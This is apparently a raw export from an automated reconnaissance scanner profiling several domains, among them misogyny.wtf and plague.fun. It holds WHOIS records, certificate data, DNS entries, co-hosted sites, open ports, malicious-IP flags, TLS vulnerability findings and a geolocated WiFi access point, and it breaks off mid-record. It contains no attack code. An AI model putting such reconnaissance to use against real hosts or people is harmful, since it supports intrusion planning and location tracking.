CloudFlare, Inc. Domain Name: CLOUDFLARE.COM Registry Domain ID: 1542998887_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.cloudflare.com Registrar URL: http://www.cloudflare.com Updated Date: 2017-05-24T17:44:01Z Creation Date: 2009-02-17T22:07:54Z Registry Expiry Date: 2024-02-17T22:07:54Z Registrar: CloudFlare, Inc. Registrar IANA ID: 1910 Registrar Abuse Contact Email: Registrar Abuse Contact Phone: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited Name Server: NS3.CLOUDFLARE.COM Name Server: NS4.CLOUDFLARE.COM Name Server: NS5.CLOUDFLARE.COM Name Server: NS6.CLOUDFLARE.COM Name Server: NS7.CLOUDFLARE.COM DNSSEC: signedDelegation DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:57Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: CLOUDFLARE.COM Registry Domain ID: 1542998887_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.cloudflare.com Registrar URL: https://www.cloudflare.com Updated Date: 2021-09-27T15:18:45Z Creation Date: 2009-02-17T22:07:54Z Registrar Registration Expiration Date: 2024-02-17T22:07:54Z Registrar: Cloudflare, Inc. Registrar IANA ID: 1910 Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited Registry Registrant ID: Registrant Name: DATA REDACTED Registrant Organization: DATA REDACTED Registrant Street: DATA REDACTED Registrant City: DATA REDACTED Registrant State/Province: CA Registrant Postal Code: DATA REDACTED Registrant Country: US Registrant Phone: DATA REDACTED Registrant Phone Ext: DATA REDACTED Registrant Fax: DATA REDACTED Registrant Fax Ext: DATA REDACTED Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Admin ID: Admin Name: DATA REDACTED Admin Organization: DATA REDACTED Admin Street: DATA REDACTED Admin City: DATA REDACTED Admin State/Province: DATA REDACTED Admin Postal Code: DATA REDACTED Admin Country: DATA REDACTED Admin Phone: DATA REDACTED Admin Phone Ext: DATA REDACTED Admin Fax: DATA REDACTED Admin Fax Ext: DATA REDACTED Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Tech ID: Tech Name: DATA REDACTED Tech Organization: DATA REDACTED Tech Street: DATA REDACTED Tech City: DATA REDACTED Tech State/Province: DATA REDACTED Tech Postal Code: DATA REDACTED Tech Country: DATA REDACTED Tech Phone: DATA REDACTED Tech Phone Ext: DATA REDACTED Tech Fax: DATA REDACTED Tech Fax Ext: DATA REDACTED Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Billing ID: Billing Name: DATA REDACTED Billing Organization: DATA REDACTED Billing Street: DATA REDACTED Billing City: DATA REDACTED Billing State/Province: DATA REDACTED Billing Postal Code: DATA REDACTED Billing Country: DATA REDACTED Billing Phone: DATA REDACTED Billing Phone Ext: DATA REDACTED Billing Fax: DATA REDACTED Billing Fax Ext: DATA REDACTED Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Name Server: ns3.cloudflare.com Name Server: ns4.cloudflare.com Name Server: ns5.cloudflare.com Name Server: ns6.cloudflare.com Name Server: ns7.cloudflare.com DNSSEC: signedDelegation Registrar Abuse Contact Email: registrar-abuse@cloudflare.com Registrar Abuse Contact Phone: +1.4153197517 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:03Z <<< For more information on Whois status codes, please visit https://icann.org/epp Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience. NOTICE: Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/ By submitting this query, you agree to abide by these terms. Register your domain name at https://www.cloudflare.com/registrar/ 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None hook.plague.fun plague.fun 2022-12-18 00:06:15 Linked URL - Internal No Web Spider 0 0 1 0 None http://misogyny.wtf misogyny.wtf 2022-12-18 00:07:06 Web Content No Web Spider 1 0 2 0 None http://misogyny.wtf:2020/copy 2022-12-18 00:16:27 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.97.9 2022-12-18 00:03:08 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.224 81.88.52.232 2022-12-18 00:14:35 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 188.114.96.9 2022-12-18 00:04:45 Malicious IP Address Yes Maltiverse 0 1 2 0 None Maltiverse [172.67.190.129] 172.67.190.129 2022-12-18 00:09:53 Co-Hosted Site No HackerTarget 0 0 2 0 None braseciscaditbest.cf 172.67.147.230 2022-12-18 00:03:32 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3233.webapps.net 81.88.52.233 2022-12-18 00:08:26 Physical Location No Fraudguard 0 0 2 0 None United States, Missouri, Kansas City 34.149.204.188 2022-12-18 00:04:30 Raw DNS Records No DNS Raw Records 0 0 1 0 None zerotwo-best-waifu.online. 900 IN TXT "v=spf1 include:spf.webapps.net ~all" zerotwo-best-waifu.online 2022-12-18 00:13:46 Affiliate - Email Address No E-Mail Address Extractor 0 0 4 0 None domain.operations@web.com Domain Name: AMENWORLD.COM Registry Domain ID: 15262498_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.networksolutions.com Registrar URL: http://networksolutions.com Updated Date: 2022-11-26T05:02:58Z Creation Date: 1999-12-14T23:19:10Z Registry Expiry Date: 2024-12-14T23:19:10Z Registrar: Network Solutions, LLC Registrar IANA ID: 2 Registrar Abuse Contact Email: abuse@web.com Registrar Abuse Contact Phone: +1.8003337680 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: NS2.AMEN.FR Name Server: PARIS.AMEN.FR DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:57Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: AMENWORLD.COM Registry Domain ID: 15262498_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.networksolutions.com Registrar URL: http://networksolutions.com Updated Date: 2022-11-26T05:03:33Z Creation Date: 1999-12-14T23:19:10Z Registrar Registration Expiration Date: 2024-12-14T23:19:10Z Registrar: Network Solutions, LLC Registrar IANA ID: 2 Reseller: Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Statutory Masking Enabled Registrant Name: Statutory Masking Enabled Registrant Organization: Statutory Masking Enabled Registrant Street: Statutory Masking Enabled Registrant City: Statutory Masking Enabled Registrant State/Province: FR Registrant Postal Code: Statutory Masking Enabled Registrant Country: FR Registrant Phone: Statutory Masking Enabled Registrant Phone Ext: Statutory Masking Enabled Registrant Fax: Statutory Masking Enabled Registrant Fax Ext: Statutory Masking Enabled Registrant Email: abuse@web.com Registry Admin ID: Statutory Masking Enabled Admin Name: Statutory Masking Enabled Admin Organization: Statutory Masking Enabled Admin Street: Statutory Masking Enabled Admin City: Statutory Masking Enabled Admin State/Province: Statutory Masking Enabled Admin Postal Code: Statutory Masking Enabled Admin Country: Statutory Masking Enabled Admin Phone: Statutory Masking Enabled Admin Phone Ext: Statutory Masking Enabled Admin Fax: Statutory Masking Enabled Admin Fax Ext: Statutory Masking Enabled Admin Email: abuse@web.com Registry Tech ID: Statutory Masking Enabled Tech Name: Statutory Masking Enabled Tech Organization: Statutory Masking Enabled Tech Street: Statutory Masking Enabled Tech City: Statutory Masking Enabled Tech State/Province: Statutory Masking Enabled Tech Postal Code: Statutory Masking Enabled Tech Country: Statutory Masking Enabled Tech Phone: Statutory Masking Enabled Tech Phone Ext: Statutory Masking Enabled Tech Fax: Statutory Masking Enabled Tech Fax Ext: Statutory Masking Enabled Tech Email: abuse@web.com Registry Billing ID: Statutory Masking Enabled Billing Name: Statutory Masking Enabled Billing Organization: Statutory Masking Enabled Billing Street: Statutory Masking Enabled Billing City: Statutory Masking Enabled Billing State/Province: Statutory Masking Enabled Billing Postal Code: Statutory Masking Enabled Billing Country: Statutory Masking Enabled Billing Phone: Statutory Masking Enabled Billing Phone Ext: Statutory Masking Enabled Billing Fax: Statutory Masking Enabled Billing Fax Ext: Statutory Masking Enabled Billing Email: abuse@web.com Name Server: PARIS.AMEN.FR Name Server: NS2.AMEN.FR DNSSEC: unsigned Registrar Abuse Contact Email: domain.operations@web.com Registrar Abuse Contact Phone: +1.8777228662 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:04Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en The data in Networksolutions.com's WHOIS database is provided to you by Networksolutions.com for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. Networksolutions.com makes this information available "as is," and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; or (2) enable high volume, automated, electronic processes that apply to Networksolutions.com (or its systems). The compilation, repackaging, dissemination or other use of this data is expressly prohibited without the prior written consent of Networksolutions.com. Networksolutions.com reserves the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. 2022-12-18 00:24:57 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.184 90.116.149.183 2022-12-18 00:09:51 Co-Hosted Site No HackerTarget 0 0 2 0 None bestlifeindividualsupportservices.com 172.67.147.230 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77afa2517c969279-FRA Content-Encoding: gzip 104.21.28.240 2022-12-18 00:25:16 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [104.21.27.242] https://www.virustotal.com/en/ip-address/104.21.27.242/information/ 104.21.27.242 2022-12-18 00:22:28 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.128:8443 188.114.97.0/24 2022-12-18 00:27:23 Malicious IP Address Yes MetaDefender 0 0 2 0 None webroot.com [188.114.97.9] 188.114.97.9 2022-12-18 00:09:42 Co-Hosted Site No HackerTarget 0 0 2 0 None ahedeyay.work 172.67.147.230 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b1ee0fdd422c1d-ORD Content-Encoding: gzip 104.21.28.240 2022-12-18 00:13:04 Vulnerability - CVE Low Yes Tool - testssl.sh 0 1 2 0 None CVE-2013-0169 https://nvd.nist.gov/vuln/detail/CVE-2013-0169 Score: 2.6 Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Per http://www.openssl.org/news/vulnerabilities.html: Fixed in OpenSSL 1.0.1d (Affected 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1) Fixed in OpenSSL 1.0.0k (Affected 1.0.0j, 1.0.0i, 1.0.0g, 1.0.0f, 1.0.0e, 1.0.0d, 1.0.0c, 1.0.0b, 1.0.0a, 1.0.0) Fixed in OpenSSL 0.9.8y (Affected 0.9.8x, 0.9.8w, 0.9.8v, 0.9.8u, 0.9.8t, 0.9.8s, 0.9.8r, 0.9.8q, 0.9.8p, 0.9.8o, 0.9.8n, 0.9.8m, 0.9.8l, 0.9.8k, 0.9.8j, 0.9.8i, 0.9.8h, 0.9.8g, 0.9.8f, 0.9.8d, 0.9.8c, 0.9.8b, 0.9.8a, 0.9.8) Affected users should upgrade to OpenSSL 1.0.1e, 1.0.0k or 0.9.8y (The fix in 1.0.1d wasn't complete, so please use 1.0.1e or later) 188.114.96.3 2022-12-18 00:06:31 Company Name No Company Name Extractor 4 0 2 0 None Identity Digital Inc. Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.169.215 2022-12-18 00:09:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.9:8080 188.114.96.0/24 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None pancakes (Net ID: 00:00:48:67:6D:D1) 37.7803446,-122.3906132 2022-12-18 00:03:06 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.183 34.149.204.188 2022-12-18 00:13:47 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None info@sonexo.nl %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: rasputin.fr status: ACTIVE eppstatus: active hold: NO holder-c: DA10525-FRNIC admin-c: DA10525-FRNIC tech-c: DA10525-FRNIC registrar: SONEXO B.V Expiry Date: 2023-08-06T23:33:00Z created: 2018-08-06T23:33:00Z last-update: 2022-08-06T23:35:46Z source: FRNIC nserver: ns1.sonexo.eu nserver: ns2.sonexo.com source: FRNIC key1-tag: 581 key1-algo: 8 [RSASHA256] key1-dgst-t: 8 [SHA256] key1-dgst: 4941121364626216209F295028F9A30785FE7E5C365AF39EB6A093CD2AF41311 source: FRNIC registrar: SONEXO B.V address: Edeseweg 52 - address: 6721 JX Bennekom country: NL phone: +31.308200291 fax-no: +31.302711470 e-mail: info@sonexo.nl website: http://www.sonexo.nl anonymous: No registered: 2014-04-21T00:00:00Z source: FRNIC nic-hdl: DA10525-FRNIC type: ORGANIZATION contact: NetTalk address: NetTalk address: Postbus 447 address: 6710BK Ede country: NL phone: +31.850160612 fax-no: +31.850160613 e-mail: info@nettalk.nl registrar: SONEXO B.V changed: 2017-02-25T15:15:13Z anonymous: NO obsoleted: NO eppstatus: serverUpdateProhibited eppstatus: associated eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.072571Z <<< 2022-12-18 00:03:06 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.181 34.149.204.188 2022-12-18 